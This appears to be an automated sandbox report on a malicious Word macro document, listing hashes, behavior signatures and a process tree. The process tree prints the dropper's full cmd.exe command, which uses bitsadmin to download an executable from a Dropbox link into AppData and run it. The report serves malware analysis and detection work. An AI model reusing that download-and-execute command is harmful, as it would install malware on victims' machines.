Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
11/09/2024, 19:56
Behavioral task
behavioral1
Sample
db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc
-
Size
109KB
-
MD5
db1dda0772c81f143e71e55da4564d95
-
SHA1
7217dd2c9da7dd0129fefaecd65a98561a3c4010
-
SHA256
0d8ad63d513a9b6f03056a3134b3c258610771388215e2c5e7b08233bf2b1ad6
-
SHA512
ba1f07d19e025ab42187af56f04e0b7d7dcfe74d805ded5a725acb1f4b7277ed8e791704e6876b51e6aecc9b80181c89d8e363ec898c76f45eaf2818017e571d
-
SSDEEP
768:p3th9csVk6tWdmUx7mOUPwAy91LSi4TSUaThfFlNGD0xz99EQ:p3pZkscv7mvPw5qi4TSlThDNGD03C
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2748 1760 cmd.exe 29 -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2120 bitsadmin.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language waitfor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1760 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1760 WINWORD.EXE 1760 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1760 wrote to memory of 2888 1760 WINWORD.EXE 30 PID 1760 wrote to memory of 2888 1760 WINWORD.EXE 30 PID 1760 wrote to memory of 2888 1760 WINWORD.EXE 30 PID 1760 wrote to memory of 2888 1760 WINWORD.EXE 30 PID 1760 wrote to memory of 2748 1760 WINWORD.EXE 31 PID 1760 wrote to memory of 2748 1760 WINWORD.EXE 31 PID 1760 wrote to memory of 2748 1760 WINWORD.EXE 31 PID 1760 wrote to memory of 2748 1760 WINWORD.EXE 31 PID 2748 wrote to memory of 2044 2748 cmd.exe 33 PID 2748 wrote to memory of 2044 2748 cmd.exe 33 PID 2748 wrote to memory of 2044 2748 cmd.exe 33 PID 2748 wrote to memory of 2044 2748 cmd.exe 33 PID 2748 wrote to memory of 2120 2748 cmd.exe 34 PID 2748 wrote to memory of 2120 2748 cmd.exe 34 PID 2748 wrote to memory of 2120 2748 cmd.exe 34 PID 2748 wrote to memory of 2120 2748 cmd.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2888
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/zyqadrxqxq8ac0s/1qesyozananrivoxityof.exe?dl=1 %appdata%\dfvuau.exe &start %appdata%\dfvuau.exe"2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\waitfor.exewaitfor /t 5 YKERQ3⤵
- System Location Discovery: System Language Discovery
PID:2044
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/zyqadrxqxq8ac0s/1qesyozananrivoxityof.exe?dl=1 C:\Users\Admin\AppData\Roaming\dfvuau.exe3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2120
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5ff99db3d22dbfb66a152889b55174b95
SHA1691de8b8d1fe877b6f7b75360b68076d73ee349c
SHA2560cb3728a9a5a982948e310ebac26319e5a8625a00f04943015a6f3359ac00337
SHA51280413a7fce5ee164fa0cf4873925813c776355bfad166e21fbe8ef114020fe8776f96380c0ff37888df80caceb4c10101716525744e152b1f9ccd3e5aa982072